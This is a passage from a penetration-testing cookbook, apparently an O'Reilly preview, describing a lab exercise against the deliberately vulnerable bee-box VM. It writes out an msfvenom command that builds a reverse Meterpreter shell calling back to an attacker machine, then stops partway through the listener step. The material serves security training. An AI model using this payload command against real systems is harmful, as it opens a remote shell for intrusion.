How to do it...

For this exercise, have both the Kali and bee-box virtual machines running, then follow the next steps:

  1. First, we use msfvenom to generate our reverse meterpreter shell, setting it up to connect back to the Kali machine's IP address. Open a Terminal in Kali and issue the following command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.10 LPORT=4443 -f elf > cute_dolphin.bin

This will create a file named cute_dolphin.bin, which is a reverse Linux meterpreter shell; reverse means that it will connect back to the attacking machine instead of listening for us to connect.

  1. Next, we need to set up a listener for ...

Get Kali Linux Web Penetration Testing Cookbook - Second Edition now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.